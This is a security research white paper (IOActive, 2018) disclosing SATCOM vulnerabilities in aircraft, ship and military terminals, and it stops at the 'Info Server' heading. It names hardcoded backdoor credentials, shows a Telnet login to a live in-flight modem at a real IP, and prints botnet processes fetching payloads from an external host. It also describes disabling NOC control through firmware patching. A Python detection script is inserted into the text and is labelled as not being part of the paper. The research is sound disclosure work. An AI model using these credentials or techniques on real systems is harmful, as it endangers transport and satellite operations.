Last Call for SATCOM Security


White Paper: Last Call for SATCOM Security
Ruben Santamarta, August 2018

Contents

Introduction
Impact
Aviation
A Global Exposure
Breaking into the MODMAN
Post-Exploitation
Firmware Functionalities
Authentication
Malware Targeting Airplanes through Exposed Telnet Service
Accelerators
Automatic Beam Switching (ABS)
Network Operations Center (NOC)
Network Services
Web
Telnet
FTP
Install Console
Info Server
Host Command Server
Maritime
The Intellian Case
Vulnerable CGIs
Malware Onboard
Controlling the Antenna
Military
Cyber-Physical Attacks
Beyond Logic Attacks, Going Physical
High Intensity Radiation Fields in the Aviation Industry
Analysis of Radiation Hazards
Antenna Models
Maritime – Intellian GX60
Cargo Vessel
Cruise ships
Aviation - Kustream 1500
Ground
In-Flight
Responsible Disclosure
Conclusion

©2018 IOActive, Inc.

Introduction

This research comprehensively details three real-world scenarios involving serious vulnerabilities that affect the aviation, maritime, and military industries. The vulnerabilities include backdoors, insecure protocols, and network misconfigurations. This white paper elaborates the approach and technical details of these vulnerabilities, which could allow remote attackers, originating from the Internet, to take control of:

• Airborne SATCOM equipment on in-flight commercial aircraft
• Earth Stations on Vessels, including Antennas
• Earth Stations used by the US Military in conflict zones

Hundreds of commercial airplanes from airlines such as Southwest, Norwegian, and Icelandair were found affected by these issues. Today, it is still possible to find vessels that are exposed to the Internet, leaving them vulnerable to malicious attacks. Also, we are providing the evidence to demonstrate that Internet of Things (IoT) malware was found actively trying to exploit exposed aircraft, as well as vessels that were already infected.

A numerical analysis of the potential Radio-Frequency (RF) hazards derived from vulnerable SATCOM devices is also provided. These results will be compared with the High Intensity Radiated Fields (HIRF) regulations used in the aviation and maritime industry, demonstrating cyber-physical attacks with impact on satellites and safety implications for vessels and ships.

Finally, the responsible disclosure process that occurred in such a sensitive and complex scenario will be covered in detail.

Impact

The following table identifies the risks that have been identified for the three in-scope industries.

Industry   Security Risk   Flight Safety Risk   RF Risk   Likelihood   Attack Vector
Aviation   Yes             No*                  No*       Medium       Remote
Maritime   Yes             N/A                  Yes       High         Remote
Military   Yes             N/A                  No        Medium       Remote

*Based on input received from the Aviation industry through the A-ISAC and our own research

A security risk reflects scenarios that allow the attacker to intercept, manipulate, or disrupt non-safety communications or move further into other networks. For instance, when a remote attacker is able to launch attacks against the devices connected to the passengers' in-flight WiFi by compromising SATCOM equipment.

We identify a safety risk when, as a direct consequence of a successful attack, there is a potential source of harm or adverse health effect on a person or persons. This research did not carry the exploitation of the security risks through to producing any safety impacts, since they could not be tested in a responsible, ethical manner.

This concept may be transposed differently across industries. For the military sector, a safety risk may be considered when adversarial forces are able to more easily pinpoint the location of military units. On the other hand, the maritime and/or aviation industries can identify hazards because of the effects of SATCOM-generated HIRFs, which may provoke malfunctions in critical navigation systems or even health damage to persons exposed to this kind of non-ionizing RF.

Industry / Threat

Aviation
• Ability to disrupt, intercept or modify non-safety communications such as In-Flight WiFi *
• Ability to attack crew and passengers' devices
• Ability to manipulate SATCOM antenna positioning and transmissions.

Maritime
• Ability to disrupt, intercept or modify onboard satellite communications
• Ability to attack crew's devices
• Ability to control SATCOM antenna positioning and transmissions
• Ability to perform cyber-physical attacks using HIRF

Military
• Ability to pinpoint the location of military units
• Ability to disrupt, intercept or modify satellite communications
• Ability to perform cyber-physical attacks using HIRF

Space
• Ability to disrupt satellite transponders

(*) Typically pilot and co-pilot do not use it. In-Flight WiFi is normally used by flight attendants for PAX and PCI transactions.
(*) Configurations may vary the impact.

Aviation

In November 2017, during a Norwegian flight from Madrid to Copenhagen, I decided to take a look at the In-Flight Entertainment System. Norwegian is well known for offering free WiFi access in most of its airplanes.

Wireshark, a common network-monitoring tool, was used to capture traffic originating at the In-Flight WiFi. After leaving it running for some time I noticed two unexpected behaviors:

• The IPs assigned to passengers' devices looked like routable IPs.

    NetRange: 128.65.0.0 - 128.65.255.255
    CIDR: 128.65.0.0/16
    NetName: RIPE-ERX-128-65-0-0

    inetnum: 128.65.80.0 - 128.65.95.255
    netname: ROW44
    descr: Hughes Network Systems GmbH
    country: DE

• It was possible to observe network scans, coming from external random hosts, directed to internal but routable IPs.

This raised a red flag, so I spent the flight mapping the internal network, passively collecting evidence and performing an initial analysis of the network traffic that was captured.

Once the flight landed, a simple network scan against those ranges revealed that multiple common services such as Telnet, WWW, and FTP were available for certain IPs. Also, a web interface could be accessed even without authentication, as the following pictures show.
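The two observations above can be turned into a check an operator could run over DHCP leases and flow records from a cabin network. This is an added example, not code from the paper; the lease and flow samples are constructed, and only the 128.65.80.0 - 128.65.95.255 range and the Telnet/WWW/FTP ports come from the text.

```python
import ipaddress
from dataclasses import dataclass

# Services the paper found reachable on the exposed range.
MGMT_PORTS = {21: "ftp", 23: "telnet", 80: "http"}

# Cabin range derived from the inetnum line of the whois record quoted above.
CABIN_NETS = list(ipaddress.summarize_address_range(
    ipaddress.IPv4Address("128.65.80.0"),
    ipaddress.IPv4Address("128.65.95.255")))


@dataclass(frozen=True)
class Flow:
    src: str
    dst: str
    dport: int


def routable_leases(leases):
    """Return the client addresses an Internet host could address directly.

    RFC 1918, CGNAT (100.64.0.0/10) and link-local space are all non-global,
    so a healthy NATed cabin network returns an empty list here.
    """
    return [a for a in leases if ipaddress.ip_address(a).is_global]


def in_cabin(addr):
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in CABIN_NETS)


def unsolicited_inbound(flows):
    """Flag flows that start outside the cabin range and target a host inside it."""
    findings = []
    for f in flows:
        if in_cabin(f.dst) and not in_cabin(f.src):
            severity = "management-service" if f.dport in MGMT_PORTS else "probe"
            findings.append((f.src, f.dst, f.dport, severity))
    return findings


def summarize(findings):
    """Group findings per external source: ports touched and worst severity."""
    out = {}
    for src, _dst, dport, severity in findings:
        entry = out.setdefault(src, {"ports": set(), "severity": "probe"})
        entry["ports"].add(dport)
        if severity == "management-service":
            entry["severity"] = severity
    return out


# Constructed sample data: hosts inside the page's range, external hosts
# taken from the documentation ranges (RFC 5737).
SAMPLE_LEASES = ["128.65.80.23", "10.8.0.14", "100.64.3.9", "169.254.7.1"]
SAMPLE_FLOWS = [
    Flow("203.0.113.50", "128.65.90.10", 23),    # external -> Telnet
    Flow("203.0.113.50", "128.65.90.10", 21),    # external -> FTP
    Flow("198.51.100.7", "128.65.81.200", 8093), # external -> other port
    Flow("128.65.80.23", "128.65.90.10", 80),    # cabin -> cabin, ignored
    Flow("128.65.80.23", "192.0.2.80", 443),     # outbound, ignored
]

if __name__ == "__main__":
    print("routable leases:", routable_leases(SAMPLE_LEASES))
    for src, info in summarize(unsolicited_inbound(SAMPLE_FLOWS)).items():
        print(src, sorted(info["ports"]), info["severity"])
```
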

At this point there was enough evidence to assume something was really wrong, but there was little information about the systems being accessed. The initial assumption was that these HX200 devices were the airborne SATCOM modems that somehow ended up being exposed to the Internet; however, considering the situation, it was mandatory to get a clear picture of the whole system before moving forward.

Fortunately, it was possible to collect a significant amount of information about these devices from different sources such as press releases, YouTube videos, manuals, FCC licensing requests, etc. The following description of the system is entirely based on information publicly accessible.

A Global Exposure

Providing in-flight connectivity through SATCOM is an important technological achievement, and obviously all the companies involved will proudly show off their success. This partially explains the amount of information it was possible to acquire from public sources. Another factor is the required regulations that vendors in this industry need to comply with, which ends up generating a significant amount of documentation. As a result, it was straightforward to discover the company that was behind the Norwegian SATCOM deployment.

The initial analysis of the gathered information also revealed other prominent airlines, such as Southwest or Icelandair, having their fleets equipped with these systems. It was possible to verify that Southwest and Icelandair fleets were also exposed, although we have no confirmation about other airlines. The following screenshot, which seems part of the GlobalEagle's NMS Software [1], provides some additional clues on the scale of this exposure.

[1] https://www.sec.gov/Archives/edgar/data/1512077/000119312517008091/d284520dex991.htm

Media outlets actively covered these engineering efforts to provide Internet connectivity at 30,000 ft. From a technical perspective, it was certainly surprising to discover the details some of these stories provided. The New York Times published a nice infographic detailing the general architecture and devices.

Figure 1. Basic architecture of a Row44 deployment (New York Times) [2]

IDG [3] also published a three-page story detailing how the WiFi connectivity in Norwegian had been implemented.

Figure 2. Detailed Row44 architecture (IDG)

On YouTube [4], there is a time-lapse video showing the deployment of this equipment on a Southwest airplane. Also, there are other videos [5] covering test flights of Row44's Albatross, where some photograms show the different devices that are in the scope of this research.

[2] https://archive.nytimes.com/www.nytimes.com/interactive/2012/07/05/business/surfing-at-560-mph.html
[3] https://techworld.idg.se/2.2524/1.644569/wifi-flygplan/sida/1/sida-
[4] https://www.youtube.com/watch?v=eFvwtfxPwac
[5] https://youtu.be/XzLU8LR9_jY?t=83


In our previous paper [6] we introduced common SATCOM infrastructures, according to which the following picture provides a clear representation of the GEE architecture [7]:

Figure 3. GEE's SATCOM assets

The Ku-band Aircraft Earth Station (AES) used by Row 44 (now part of GlobalEagle) provides two-way broadband communication services to passengers and flight crews, allowing in-flight, real-time access to the Internet. The AES operates in conjunction with a Very Small Aperture Terminal (VSAT) network hub station that is licensed to Hughes Network Systems (HNS). This service between multiple aircraft terminals and the Internet is provided via multiple satellite gateways under the control of a Network Operations Center (NOC). Satellite gateways are procured from HNS based on the existing Hughes HX, as well as HT architecture. A key element of the HNS satellite system is a VSAT HX/HT broadband terminal that provides Internet Protocol (IP) connectivity via geostationary satellites, augmented with a mobility feature to offer airborne users broadband IP data service.

The system supports reception and transmission in the 11.70 GHz to 12.20 GHz and 14.05 GHz to 14.47 GHz band respectively, utilizing independent linearly polarized array antennas for communication to and from a geostationary satellite in space.

This deployment complies with the ARINC 791 standard, which defines Ku and Ka band satellite data airborne terminal equipment. This standard allows a certain degree of flexibility in terms of the functionalities implemented, but we can provide a generic description of the components as follows:

1. MODMAN – Modem Manager
The MODMAN hosts the modem, which modulates and demodulates signals to and from baseband but also implements core functionalities such as interfacing with the KANDU and KRFU or receiving external signals from other aircraft sensors or units.

2. KANDU – Ku/Ka Band Data Unit
It provides power to the satellite antenna and uses external inputs, such as aircraft navigational data, to control its movement. In addition to implementing the positioning algorithms it also interfaces with the KRFU.

3. KRFU – Ku/Ka Band Radio Frequency Unit
The KRFU converts modem IF to Ku- or Ka-band frequencies from the modem to prepare for transmission to the satellite. It also works as a high-power amplifier for transmitting the signal. The KRFU governs this process in reverse as well, converting the Ku- or Ka-band transmissions received from the satellite back to the IF.

4. OAE – Outside Antenna Equipment
This is the antenna unit that may be located in different positions, such as Tail Mounted Antennas (TMA) or Fuselage Mounted Antennas (FMA).

[6] https://ioactive.com/pdfs/IOActive_SATCOM_Security_WhitePaper.pdf
[7] https://www.sec.gov/Archives/edgar/data/1512077/000119312517008091/d284520dex991.htm

As such, GEE's ARINC 791 equipment is comprised of the following elements:

ARINC 791 | Model         | Device | Vendor  | Function
MODMAN    | Modem         | MDU    | Kontron | Modem, built on top of a Hughes HX200 SATCOM modem
KANDU     | KuStream 1000 | ACU    | TECOM   | Antenna Control Unit
KANDU     | Server        | SMU    | Kontron | Server Management Unit. It is an airborne server that hosts the IFE Portal and other core services.
OAE       | KuStream 1000 | SAA    | TECOM   | Phased Array Antenna
KRFU      | KuStream 1000 | HPT    | TECOM   | High Power Transceiver

MDU – Modem Data Unit
ACU – Antenna Control Unit
SMU – Server Management Unit
SAA – Satellite Antenna Assembly
HPT – High Power Transceiver

In order to operate a network for in-flight connectivity, the service provider must work with all relevant aviation authorities (i.e. EASA, FAA) to secure the necessary Supplemental Type Certificates (STCs). Most of these documents are publicly accessible [8], thus providing valuable information to understand the capabilities and requirements for these systems.

At this point we are in a position to summarize how the GEE ARINC 791 deployment is working, which would also allow us to properly elaborate the attack scenarios.

The SMU (on the left) serves as the system controller, providing core functionalities to both the KANDU, KRFU and MODMAN (on the right) but also to passengers and crew as it is exposing the IFE Portal.

[8] https://www.fcc.gov/licensing-databases/general/search-fcc-databases

The SMU also provides the switching of data from various peripherals located in the aircraft cabin and utilizes an aircraft digital computer interface to receive aircraft position, state of flight, etc. The SMU also receives aircraft level discrete inputs to detect various conditions, including the Weight-on-Wheels signal.

Additionally, the SMU is capable of establishing 3G data links only on the ground. This cellular antenna is located inside the radome, as shown below.

Figure 4. Cellular antenna in radome [9]

The ACU and the HPT have been discovered directly interfacing via discrete inputs, but also through Ethernet in the same network segment that the MDU and SMU have access to.

Figure 5. Interfaces [10]

[9] Southwest WiFi Installation https://www.youtube.com/watch?v=eFvwtfxPwac
[10] http://www.tecom-ind.com/files/547dfa557058d-WebKustreamBrochureOct2014.pdf

Figure 6. Interfaces [11]

As a result, once the MDU is compromised, it is possible to reach both the ACU and HPT. The SMU remains accessible from the in-flight WiFi; although this does not intrinsically mean it can be easily compromised. If that situation ever happens the attacker will be in a position to gain control over the entire ARINC 791 deployment aboard the target aircraft.

[11] http://www.kustream.com/gallery.php

According to the documentation collected, except for the MDU and the CWLU, the remaining devices run Linux.

Cabin Wireless LAN Units (CWLU) are provided to allow users with 802.11g/n enabled devices to gain access to the airborne connectivity. Regarding the CWLU, Josep Pi, Senior Security Consultant at IOActive, will be presenting at DefCon'18 his research on breaking the Operating Systems these, and other Access Points use: ExtremeNetworks' WingOS [12].

[12] https://www.defcon.org/html/defcon-26/dc-26-schedule.html

Figure 7. GEE devices [13]

Flight crew also has specific elements both at the cabin and cockpit to control the system.

Breaking into the MODMAN

At this point it is worth summing up the steps that have been followed so far:

1. In-Flight network traffic capture
2. In-Flight network mapping
3. Hughes/GlobalEagle (GEE) network scanning
4. Initial information gathering

[13] https://techworld.idg.se/2.2524/1.644569/wifi-flygplan/sida/2/sida-2

Having a decent amount of information about GEE's system internals, and its corresponding SATCOM Hughes infrastructure, it was time to get back to the analysis of the exposed systems identified during the Stage 3.

GEE's MODMAN is a Kontron device built on top of a Hughes HX200 SATCOM modem. During the previous SATCOM research in 2014, we identified multiple vulnerabilities in Hughes SATCOM terminals, including backdoors. When a company has been found embedding backdoors in its products, it is not usually a developer's mistake but actually a design pattern. In this case by reading the official HX200 documentation [14] an interesting feature was noticed:

“The Fallback Updater”

Software that is able to install new firmware to the unit without asking for a password is definitely a good candidate to host a backdoor. Using a simple Google search it is possible to download the fallback updater software from the website of a satellite provider [15].

This program contains both the recovery firmware ‘fallback.bin’ and the Windows program ‘HUGHES_updater.exe’ to update the device. By reverse engineering this binary we can know more about how the updating mechanism has been implemented.

[14] http://dbstv.com/wp-content/uploads/2014/07/HX200_Installation_Procedure_Rev_A-04_060413.pdf
[15] http://support.iwayafrica.com/index.php?_m=downloads&_a=viewdownload&downloaditemid=37

1. The following code is pretty explanatory; it is basically the interface we have seen in the previous page. The program requires us to provide the Unit's IP and then Fallback updater will connect to the port 23 (Telnet).

2. Once connected it looks for the following login prompt “VxWorks Login:” which corresponds to the default VxWorks's shell service.

3. It sends the username ‘brighton’ and then waits for the password prompt from the server.

4. Finally, it sends the backdoor password ‘swordfish’ and waits for the shell's prompt ‘->’.

Obviously, the next step was to try this backdoor against the GEE's MODMAN to see if we could really get a shell on an in-flight aircraft, via the Internet.

    Trying 128.65.92.65...
    Connected to 128.65.92.65.
    Escape character is '^]'.
    VxWorks login: brighton
    Password:
    ->

We were in.

One of the most disappointing aspects of this discovery is that these hardcoded credentials have been present and well known in certain Hughes devices since at least the mid 2000's [16, 17, 18].

[16] http://www.dslreports.com/forum/r22972398-HN7000s-serial
[17] http://www.dslreports.com/forum/r18345515-HN7000S-telnet-login
[18] http://www.dslreports.com/forum/r21504271-How-to-use-static-IP-HN7000S

Post-Exploitation

It was also possible to access the FTP server using the same credentials. By accessing the filesystem we could download the actual firmware (‘/cfg0/main.bin’) running in the MODMAN in addition to logs or configuration files.

So, we already have access to the firmware, web interface, VxWorks Shell, FTP server, and documentation. These elements allow us to understand the system and its capabilities in detail. However, we cannot forget that we were accessing an in-flight aircraft, so the idea is to gain as much knowledge as possible while performing innocuous, and ideally passive, actions only.

In order to comply with this approach, it is crucial to reverse engineer the firmware and map all those functionalities that are described in the collected documents into the assembly that is being analyzed. However, as we have previously seen, we also need to stay vigilant to spot undocumented functionalities.

As a result, this is basically a static analysis approach, although we are leveraging the access to a live system in order to gather some information that can be useful to add some context.

There are two main goals for the post-exploitation phase; we want to:

• Turn the GEE's ARINC 791 equipment (MDU, HPT and ACU) into a malicious intentional radiator. This involves controlling the power of the transmission, how and when the signal is transmitted and the antenna pointing mechanism.
• Eavesdrop and tamper with crew and passengers' communications.

Satellite terminals are usually quite complex in terms of functionalities. Despite this we are oversimplifying here to introduce an underlying issue: Satellite terminals are ‘dumb’ devices.

This does not mean they are not capable of doing complex actions, but they require ‘someone’ to tell them when, and usually how, to perform those operations. In this sense, they are similar to an ATM, which is totally capable of performing complex tasks, such as dispensing cash, but it must be instructed from the Host on how to do so.

We have to take into account that most of the time the SATCOM modem depends on the Network Operations Center (NOC) to comply with the satellite network's requirements. We will see later how potential attackers can leverage this design.

There are three key documents that can be used as a reference to understand the system as a whole as well as the devices we have previously described:

• “HX System Overview” [19]
It provides a comprehensive analysis of the Hughes HX system. If you are interested in following this whitepaper from a technical perspective, this document is a highly recommended read.

• “Apparatus and Method for Efficient TDMA Bandwidth Allocation for TCP/IP Satellite-Based Networks” [20]
This patent from Hughes contains really valuable information about the internal protocols used between the NOC and the Earth Stations. It can be used to reconstruct and understand proprietary packet structures in the firmware.

• “Row 44, Inc. Application for Authority to Operate Up to 1,000 Technically Identical Aeronautical Mobile Satellite Service Transmit/Receive Earth Stations Aboard Commercial and Private Aircraft” [21]
This is the FCC's approval letter for Row44 that authorizes them to operate the ARINC 791 system we are analyzing. It contains valuable information about its internal logic and functionalities.

The version of the HX200 firmware in scope is ‘6.9.0.51’.

Main.bin: 6e64d4821c71d1312ff42d8dc8d2c86795852ed1

Inside ‘main.bin’ we can find a MIPS VxWorks image which embeds the Hughes Crypto Kernel (libchk.elf) [22] for terminals operating in FIPS 140-2 mode.

This library is also used, at runtime, to verify the digital signature of main.bin. This security scheme can be bypassed.

[19] https://usermanual.wiki/Hughes/HxSystemoverview.867933836/view
[20] https://www.google.com/patents/US6834039
[21] https://apps.fcc.gov/edocs_public/attachmatch/DA-09-1752A1.pdf
[22] https://csrc.nist.gov/Projects/Cryptographic-Module-Validation-Program/Certificate/919

The VxWorks image has been compiled with the full Symbol Table intact, so it was possible to reconstruct symbols using a simple IDA script that can be found at the IOActive public repository [23].

Firmware Functionalities

The HX200 is a high-performance satellite router designed to provide carrier-grade IP services using dynamically assigned high-bandwidth satellite IP connectivity. The firmware is quite complex due to the number of functionalities that have been implemented, such as:

• Software and configuration updates via download from the HX Gateway
• Implements dynamic, self-tuning Performance Enhancement
• Performance Enhancing Proxy (PEP) [24] software to accelerate the throughput performance by optimizing the TCP transmission over the satellite, delivering superior user experience and link efficiency
• Configuration, status monitoring, and commissioning via the NOC
• Embedded Web interface for local status, control and troubleshooting
• Remote terminal management via the Hughes Unified Element Manager and SNMP agent
• Dynamic outbound coding and modulation changes based on received signal
• Dynamic inbound coding changes based on received signal
• Dynamic remote uplink power control

The following areas illustrate some of the functionalities that will fit into our attack scenario.

Authentication

As we could expect, the ‘brighton/swordfish’ backdoor is present. Please note that the password is in VxWorks' hashed form.

[23] https://github.com/IOActive/
[24] https://www.ietf.org/proceedings/50/I-D/pilc-pep-05.txt

In addition to these credentials we can find another pair: ‘crypto/officer’. These are apparently used for the Crypto-officer role that terminals, operating in FIPS-140-2 mode, need to support.

These credentials are initialized by ‘cfm_get_support_parms’.

They are then added to the embedded web server configuration to restrict access to certain web pages to the CryptoOfficer role only.

As we can see in the paths, there are some specific functions reserved for this role. Definitely, we could use these backdoors to gain access to the MDU through FTP, Telnet or the embedded Web UI, in those places where it requires authentication.

Malware Targeting SATCOM Terminals through Exposed Telnet Service

In this case, before proceeding with the static analysis approach we leveraged the access to a live system to obtain a clear picture of the network activity. We can use both the shell and the Web UI to obtain this information, as in some cases the web UI is merely a wrapper for VxWorks' shell commands.

We previously described that the device was exposing, among other services, the VxWorks default shell. In the following picture, which shows the active network connections, there is an interesting pattern:

There are a couple of public IPs trying to connect to the Telnet service, so the highlighted IP (181.27.184.18) was further investigated to understand whether these connections were targeted or not.

    Nmap scan report for 181-27-184-18.speedy.com.ar (181.27.184.18)
    Host is up (0.45s latency).
    Not shown: 990 closed ports
    PORT     STATE    SERVICE
    22/tcp   open     ssh
    23/tcp   filtered telnet
    53/tcp   filtered domain
    80/tcp   open     http
    554/tcp  filtered rtsp
    555/tcp  filtered dsf
    1025/tcp filtered NFS-or-IIS
    1026/tcp filtered LSA-or-nterm
    4224/tcp filtered xtell
    8093/tcp filtered unkno

The offender host appeared to be a compromised router from Argentina. By examining the running processes, it is easy to notice that something is wrong in the router:

    ~ $ ps
    PID  Uid  VSZ  Stat Command
    1    root 1212 SW   init
    ...
    577  root 1508 SW   /usr/bin/ip6aac
    587  root 1212 SW   -sh
    619  root 1500 DW   /usr/bin/adslstart 2 1
    620  root 1500 DW   /usr/bin/adslstart 2 1
    695  root 764  SW   /sbin/2684d
    1509 root      SW<  [kTPTd]
    1517 root 224  SW   iwcontrol wlan0
    1946 root 292  SW   l2bwl4bw57bw3f3opmps
    1947 root 268  SW   l2bwl4bw57bw3f3opmps
    1949 root 384  SW   l2bwl4bw57bw3f3opmps
    2401 root 428  SW   l2bwl4bw57bw3f3opmps
    2741 root 836  SW   /usr/bin/3g-stub
    2746 root 1268 SW   3g-mngr diald
    2775 root 1284 SW   3g-mngr diald
    2895 root 1212 SW   sh -c cd /tmp || cd /var/run || cd /mnt || cd /root |
    2903 root 1212 SW   sh tftp2.sh
    2913 root 1212 SW   sh -c cd /tmp || cd /var/run || cd /mnt || cd /root |
    2921 root 1208 SW   sh tftp2.sh
    2923 root 1220 SW   tftp -r ntpd -g 104.153.108.77
    2945 root 252  SW
    2946 root 1220 SW   tftp -r sshd -g 104.153.108.77
    2947 root 1404 SW   /usr/sbin/dropbear
    2962 root 1212 SW   -sh

Further analysis revealed this router was part of the Gafgyt IoT botnet, scanning for new potential targets.

There is no indication that this malware family either had success accessing the SATCOM terminal on any aircraft or that it was specifically targeting airborne routers, so we should consider this situation as a ‘collateral damage’. However, the astonishing fact is that this botnet was, inadvertently, performing brute-force attacks against SATCOM modems located onboard an in-flight aircraft.

Accelerators

SATCOM devices usually implement data accelerators, either internally or by using external equipment. Hughes' HX system is not an exception so its terminals support both TCP/IP and Web browsing acceleration through the PEP and TurboPage functionalities respectively. The following pictures are extracted from official Hughes documents [25].

[25] https://usermanual.wiki/Hughes/H48792Hr1.788988241.pdf

We can easily identify the functions behind the TurboPage implementation, as the following image shows. From an offensive perspective, this would allow an attacker to intercept the websites that are being requested, also opening the door to manipulate data at will.

Also, there are compression algorithms involved in this functionality, such as YK, BLC, or the extended version of V44 that was created by Hughes.

Performance Enhancing Proxy

Companies should notice that accelerators need to be considered an attack vector for SATCOM deployments. Usually the logic behind them involves intense parsing of web pages and/or TCP/IP packets.

Automatic Beam Switching (ABS)

This kind of technology allows the ACU to be directly controlled by a modem in order to maintain connectivity while moving from different beams. This ‘roaming’ is performed according to locally stored satellite footprint maps, satellite parameters and real-time positions.

Although the MDU supports this mode of operation, when it is enabled through the ‘local.a’ configuration file (‘/cfg0/local.a’), for GEE's deployment this functionality has been disabled:

    absCfEnable=0
    acuCfPort=0
    acuCfType=0
    acuCfPolType=0
    acuCfIpAddress=0

However, it is interesting to briefly analyze the logic behind HX200's ABS implementation to illustrate how potentially, in a different scenario, it would be possible to command a specific ACU (different from the model that GEE is using) directly from the modem.

First of all, the firmware checks whether ABS has been enabled, and if so then proceeds to obtain the required parameters for the supported ACU [26], from the same configuration file, such as IP and port.

Then the MDU tries to connect to the ACU.

[26] orbit-cs.com

Once connected, it uses the custom ACU's protocol to initiate the handshake.

When this handshake has been completed, and the modem has successfully established a connection to the ACU, there are different commands that can be sent to this ACU in order to mute/unmute the transmission (by controlling the Block Up Converter).

Having control over whether an antenna is transmitting or not is a key capability when considering RF attacks in SATCOM environments.

This situation also introduces the problem of the security posture we can find in protocols used to interface with different ACUs, also in the maritime sector. For instance, OpenAMIP [27] does not strictly require a specific authentication or authorization mechanism. The same issue has been found in other proprietary protocols, although details are omitted in this paper.

Network Operations Center (NOC)

We anticipated SATCOM terminals highly depend on the NOC to receive instructions to properly operate. In our specific case, the NOC is in charge of the following functions:

• Managing satellite transponder capacity
• Allocating forward and return link frequencies, transmit authorization, data rate, and transmit power for each airborne terminal
• Monitoring of the EIRP levels to each satellite transponder and commanding transmit power changes of selected airborne terminals as required
• Managing data rate change requests from airborne terminals.
• Managing aggregate off-axis EIRP spectral density
• Managing faults of the system, including maintaining system wide keep-alive signaling for positive control of airborne terminal transmissions

[27] “OpenAMIP is an IP based protocol that facilitates the exchange of information between an Antenna Controller Unit and a satellite router.

36 Basically, once data from the aircraft navigation system is available, the antenna automatically points to the desired satellite and begins receiving the forward links. However, in order to avoid RF interference with other satellites, the airborne terminal cannot start transmitting to the satellite until the NOC authorizes the terminal via the forward link. Upon receipt of this authorization, the airborne terminal consults non-transmit policy information locally stored and compares this to aircraft navigation system location information to determine whether the aircraft is permitted to transmit. Still, there are other inputs that complete the ‘enable transmission logic’:
• No faults are detected
• The calculated pointing direction is not inside a ‘blocked direction’ mask area
• Correct polarization
• Pointing error is sensed as less than the regulatory limit (0.2 degrees)
• The Modem is locked on the desired satellite RX signal

Not all these functions are controlled by the modem, so in order to turn our compromised HX200 into an intentional radiator we also may need to take control over certain functionalities on the KRFU and KANDU.

The different kinds of messages supported between the terminal and the NOC are quite complex. They are well described in the patents we have previously referenced. Instead of elaborating all of them, we basically focus on an important example to illustrate how it

37 would be possible to prevent the NOC from remotely disabling or controlling the terminal. As a result, once a malicious firmware has been installed in the compromised MDU, it is possible to let the terminal operate independently, instead of being under NOC’s control.

By consulting one of the three key documents [28] we can find the following command, that is sent via an ICAP packet (Inroute Command/Acknowledgement Packet):

If the NOC detects any situation that requires the airborne terminal to be disabled, this command will be received. Let’s analyze in the firmware how it is handled:

In the ‘ParseICAP’ function we can see the different subcommands that are supported, but we can also see others that are not publicly documented.

[28] https://www.google.com/patents/US6834039

38 For example, when receiving an ICAP where the command byte is '4h' (actually 0xC4h in the ICAP frame), which corresponds to 'Enable/Disable transmit' operation, the following code is executed:

At 0x81611515 we have the flag that other functions check to know whether the MDU is allowed to transmit or not. Using the same approach, we can track and patch any other function that handles those messages sent by the NOC to instruct our terminal on using a specific amount of power for the transmission, Inroute Groups, Frequencies, Timing, Bandwidth restrictions, bitrate, modulation and coding schemes, ALOHA slots, etc. As a result, it is possible that a compromised SATCOM terminal operates independently, without complying with the NOC instructions. Also, we can enable the inroute without a valid outroute. Thus, the modem may be transmitting when it is not authorized to do so, which basically breaks several fundamental regulatory rules for Earth Stations Aboard Aircraft (ESAA) such as § 25.227(a)(9) and § 25.227(a)(10) [29].

[29] http://licensing.fcc.gov/myibfs/download.do?attachment_key=1091461

39 Among other attacks, this can be leveraged by attackers to launch denial of service attacks against satellites, both from a logical and physical perspective. In case this situation is detected, airlines and satellite service providers can use a secondary communication channel, such as ACARS, in order to instruct the crew to disable the unit manually.

Network Services

Web

Without any authentication it is possible to monitor the status of the unit, network connections, statistics, arp entries, webs being accessed by passengers, etc. Also, it is possible to perform more aggressive actions such as rebooting the terminal.

40 Telnet

Using backdoors, we can get access to the VxWorks Shell console. In terms of impact, this kind of access grants the attacker the ability to execute arbitrary code. This vector can also be leveraged to achieve persistence.

-> help
help                                   Print this list
ioHelp                                 Print I/O utilities help info
dbgHelp                                Print debugger help info
nfsHelp                                Print nfs help info
netHelp                                Print network help info
spyHelp                                Print task histogrammer help info
timexHelp                              Print execution timer help info
h [n]                                  Print (or set) shell history
i [task]                               Summary of tasks' TCBs
ti task                                Complete info on TCB for task
sp adr,args...                         Spawn a task, pri=100, opt=0, stk=20000
taskSpawn name,pri,opt,stk,adr,args... Spawn a task
td task                                Delete a task
ts task                                Suspend a task
tr task                                Resume a task
d [adr[,nunits[,width]]]               Display memory
m adr[,width]                          Modify memory
mRegs [reg[,task]]                     Modify a task's registers interactively
pc [task]                              Return task's program counter
Type <CR> to continue, Q to stop:
iam "user"[,"passwd"]                  Set user name and passwd
whoami                                 Print user name
devs                                   List devices
ld [syms[,noAbort][,"name"]]           Load stdin, or file, into memory (syms = add symbols to table: -1 = none, 0 = globals, 1 = all)
lkup ["substr"]                        List symbols in system symbol table
lkAddr address                         List symbol table entries near address

41
checkStack [task]                      List task stack sizes and usage
printErrno value                       Print the name of a status value
period secs,adr,args...                Spawn task to call function periodically
repeat n,adr,args...                   Spawn task to call function n times (0=forever)
version                                Print VxWorks version info, and boot line

FTP

Using backdoors, it is possible to access the filesystem. It is worth mentioning that FTP is one of the accepted methods to update the firmware. This vector can also be leveraged to achieve persistence.

250 Changed directory to "/cfg0/"
ftp> ls
227 Entering Passive Mode (128,65,86,65,4,1)
150 Opening ASCII mode data connection
size      date         time      name
--------  ------       ------    --------
4532309   Jan-01-1980  00:00:14  fallback.bin
386543    Jan-01-1980  00:04:58  zipdb.gz
3025      Jun-17-2016  19:16:26  sbc.cfg
82        Jan-01-1980  00:05:38  bootline.txt
2048      Aug-24-2016  01:48:32  config
2048      Jul-10-2016  00:02:02  new
2048      Nov-25-2017  23:46:22  logs
2975      Nov-25-2017  20:35:40  reset.log
18        Nov-25-2017  20:48:04  time.log
8         Nov-25-2017  20:42:18  main.dat
524288    Nov-25-2017  20:34:30  leofs
0         Dec-04-2013  16:53:52  eeprom.dat
2005      Nov-25-2017  23:52:34  cimcfg.a
2048      Dec-04-2013  16:53:48  bin
2048      Nov-25-2017  20:38:08  snmpd
894       Jan-25-2016  15:43:54  txradio.dat
63        Jul-10-2016  00:02:02  rules.txt

Install Console

This service was listening on port 1953/TCP without authentication. It allows a user to configure and control the modem.

42 Info Server

